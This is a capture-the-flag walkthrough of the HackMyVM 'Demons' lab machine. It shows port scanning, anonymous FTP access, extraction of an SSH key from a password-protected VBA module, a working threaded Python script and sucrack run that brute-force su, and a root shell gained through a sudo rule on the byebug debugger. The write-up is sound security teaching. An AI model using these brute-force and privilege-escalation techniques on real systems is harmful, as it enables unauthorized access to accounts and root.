HackMyVm Demons Walkthrough

Find IP of the machine.

 ~ sudo arp-scan --interface eth1                             
 ...  08:00:27:71:4c:b6       PCS Systemtechnik GmbH

Scan ports.

 ~ nmap -sV -sC -p-  -oN ports.log   
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-21 08:42 CST
 Nmap scan report for
 Host is up (0.00090s latency).
 Not shown: 65532 closed ports
 21/tcp open  ftp     vsftpd 3.0.3
 |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |      Connected to
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 2
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 5e:44:8a:b1:77:0c:42:79:16:64:8d:af:b4:78:bb:b4 (RSA)
 |   256 cb:0f:a7:df:7f:23:78:5a:08:e3:4f:b6:43:7c:11:84 (ECDSA)
 |_  256 a0:4a:26:bf:40:08:68:c2:b1:04:88:b4:8b:a2:45:2f (ED25519)
 80/tcp open  http    Apache httpd 2.4.48 ((Debian))
 |_http-server-header: Apache/2.4.48 (Debian)
 |_http-title:  DemonsCloseCall
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Log in to FTP anonymously. The hidden directory .toolsHidden contains DemonsVBAMacroTools.mdb, which is world-readable and can be downloaded; DemonsCellsDogma.xlsx is mode 600 and owned by uid 1000, so the anonymous ftp user cannot retrieve it.

 ftp> cd .toolsHidden
 250 Directory successfully changed.
 ftp> ls -la
 200 PORT command successful. Consider using PASV.
 150 Here comes the directory listing.
 drwxrwxrwx    2 0        0            4096 Sep 16 15:17 .
 drwxr-xr-x    3 0        115          4096 Sep 16 15:18 ..
 -rw-r--r--    1 0        0              55 Sep 10 17:21 .what
 -rw-------    1 1000     1000        12018 Sep 10 17:19 DemonsCellsDogma.xlsx
 -rwxrwxrwx    1 1000     1000       339968 Sep 16 15:17 DemonsVBAMacroTools.mdb

Open the .mdb in Access: it contains a VBA module that is password protected. That password only locks the VBA editor view; the module source is still stored inside the file, so the well-known VBA project password bypasses apply.

Once the protection is removed the source can be read, and it holds an SSH private key. Save the key to key.txt.

Enumerate port 80. The page at http://ip/hell gives two usernames (aim and agares, as it turns out).

Try the private key against aim (chmod 600 key.txt first, or ssh will refuse to use a key with open permissions).

 ~ ssh aim@ -i key.txt      
 Last login: Tue Sep 21 04:52:35 2021 from
 aim@Demons:~$ id
 uid=1001(aim) gid=1001(aim) groups=1001(aim)

In /home/aim there is an image named key8_8.jpg. It is the hint for the password of the other user, agares.

The image shows a keyboard on which seven keys, "34odfnm", are marked differently from the rest, so the password alphabet is just those seven characters.

The 8_8 in the file name suggests the password is exactly 8 characters long, which maps to "crunch 8 8".

First generate the full list with crunch: every 8-character string over a 7-character alphabet, 7^8 = 5764801 words.

 ~ crunch 8 8 dfnmo34 > tmp.txt                               
 Crunch will now generate the following amount of data: 51883209 bytes
 49 MB
 0 GB
 0 TB
 0 PB
 Crunch will now generate the following number of lines: 5764801

If the password uses all seven characters, then with 8 positions exactly one character appears twice, and every candidate that does not use all seven can be dropped.

A script (thanks to avijneyam#8394 for it) applies that filter to shrink the list:

 with open("tmp.txt") as f:
     lines = f.read().splitlines()
 data = []
 for line in lines:
     uline = list(set([i for i in line]))   # distinct characters in this candidate
     counts = []
     for char in uline:
         counts.append(line.count(char))    # how often each distinct character occurs
     counts.sort()
     # 8 characters over 7 distinct values: sorted counts are [1, 1, 1, 1, 1, 1, 2]
     if counts[-1] == 2 and counts[-2] == 1:
         data.append(line)
 data = "\n".join(data)
 with open("dic.txt", "w") as f1:
     f1.write(data)

The new list has 141120 words (7 choices for the repeated character times 8!/2 = 20160 arrangements), still a large one. wc -l reports one fewer because the script writes no newline after the last word:

 ~ wc -l dic.txt
 141119 dic.txt
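The same list can be built directly from the constraint instead of filtering crunch's 5764801 lines. The script below is an added example, not the walkthrough's or the credited script's code; it assumes the walkthrough's reading of the hint (alphabet "34odfnm", length 8, every character used), and the function and file names are my own. It also checks the closed-form count and, for small alphabets, that the direct construction agrees with the crunch-plus-filter approach.

```python
#!/usr/bin/env python3
"""Build the reduced su wordlist directly, without running crunch first.

Added example (not the walkthrough's or the credited script's code). It uses
the walkthrough's assumptions: the alphabet is the seven highlighted keys
"34odfnm", the password is 8 characters long, and every one of the seven
characters is used, so exactly one character appears twice.
"""
from itertools import permutations, product
from math import factorial

ALPHABET = "dfnmo34"   # the seven keys marked in key8_8.jpg
LENGTH = 8             # from the "8_8" in the file name


def expected_count(alphabet=ALPHABET, length=LENGTH):
    """Closed form: pick the repeated character (7 ways), then arrange
    `length` characters of which two are identical (8!/2! ways)."""
    return len(alphabet) * factorial(length) // 2


def is_candidate(word, alphabet=ALPHABET, length=LENGTH):
    """The test the walkthrough's filter script applies to each crunch line:
    right length and every alphabet character present."""
    return len(word) == length and set(word) == set(alphabet)


def candidates(alphabet=ALPHABET, length=LENGTH):
    """Yield every candidate exactly once, in no particular order.

    For each choice of the doubled character, the candidates are exactly the
    distinct permutations of the multiset alphabet + doubled. permutations()
    treats the two copies as different positions, so each word comes out
    twice; the per-character set() drops the duplicate.
    """
    if length != len(alphabet) + 1:
        raise ValueError("reduction needs length == len(alphabet) + 1")
    for doubled in alphabet:
        seen = set()
        for perm in permutations(alphabet + doubled):
            word = "".join(perm)
            if word not in seen:
                seen.add(word)
                yield word


def brute_force_count(alphabet, length):
    """What crunch + the filter script would produce: enumerate the full
    alphabet^length space and keep the candidates. Only for small sizes."""
    return sum(1 for w in product(alphabet, repeat=length)
               if is_candidate("".join(w), alphabet, length))


def write_wordlist(path="dic.txt"):
    """Write one candidate per line with a trailing newline so wc -l matches."""
    words = list(candidates())
    with open(path, "w") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    n = write_wordlist()
    print(f"wrote {n} candidates to dic.txt (expected {expected_count()})")
```

Running it writes the 141120 candidates to dic.txt in a fraction of a second; the ValueError guards against reusing the function for a length where the "exactly one repeat" reasoning does not hold.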

Then brute-force su with that list to recover agares's password.

sucrack, a multithreaded su brute-forcer available on GitHub, is built for exactly this. With 100 worker threads (-w 100) it takes about 18 minutes; more threads than that caused errors. Each failed attempt costs PAM's deliberate delay on authentication failure, hence the many threads, and every attempt is written to auth.log by su and PAM, so this is very noisy on a real system.

 aim@Demons:~$ time ./sucrack -a -w 100 -u agares dic.txt 
 password is: xxxxxxxx
 real    18m19.760s
 user    11m7.012s
 sys     4m59.095s

A Python script can do the same brute force, but it is much slower than sucrack (roughly ten times slower here):

 import threading
 from subprocess import PIPE, STDOUT, Popen

 threads = []
 t_nums = 100  # number of threads

 correct_pass = ""  # set by the thread that finds the password
 current = 0        # count of passwords tried so far (approximate, no lock)
 total = 0          # total count of passwords

 def crack_thread(*pass_list):
     # each thread tries its own slice of the wordlist against su
     global correct_pass
     global current
     for pwd in pass_list:
         if len(correct_pass) > 0:  # correct_pass has been found, exit thread
             return
         current += 1
         # su reads the password from stdin when stdin is not a tty; "-c id"
         # makes a successful login print "(agares)" and exit immediately
         p = Popen(['su', 'agares', '-c', 'id'], stdin=PIPE, stdout=PIPE, stderr=STDOUT)
         out, _ = p.communicate(input=(pwd + "\n").encode())
         res = out.decode(errors="replace")
         if res.find("(agares)") != -1:
             print(f"\nPassword is {pwd}\n")
             correct_pass = pwd

 with open('mini.txt', 'r') as passfile:
     passes = passfile.read().splitlines()  # one password per line, newlines stripped
     total = len(passes)

 t_size = total // t_nums  # passwords count of each thread
 t_last = total % t_nums   # if mod is not 0, there will be another thread

 for i in range(t_nums):
     passblk = passes[i*t_size:(i+1)*t_size]
     threads.append(threading.Thread(target=crack_thread, args=passblk))
 if t_last > 0:
     passblk = passes[t_size*t_nums:]
     threads.append(threading.Thread(target=crack_thread, args=passblk))
 for t in threads:
     t.start()
 for t in threads:
     t.join()

 aim@Demons:~$ time python3 mt.py
 Password is xxxxxxxx

 real    185m22.898s
 user    98m29.009s
 sys     62m7.093s

Check sudo -l as user agares.

 agares@Demons:/home/aim$ sudo -l
 [sudo] password for agares:
 Matching Defaults entries for agares on Demons:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User agares may run the following commands on Demons:
     (ALL : ALL) /bin/byebug

Getting root is now trivial: byebug is a Ruby debugger that loads and executes the script it is given, so any Ruby in that file, including system("/bin/sh"), runs with sudo's root privileges. A sudo rule on any interpreter or debugger is effectively a rule for ALL.

 agares@Demons:~$ echo 'system("/bin/sh")' > tmp.rb
 agares@Demons:~$ sudo byebug tmp.rb

 [1, 1] in /home/agares/tmp.rb
 => 1: system("/bin/sh")
 (byebug) continue
 # id;hostname
 uid=0(root) gid=0(root) groups=0(root)
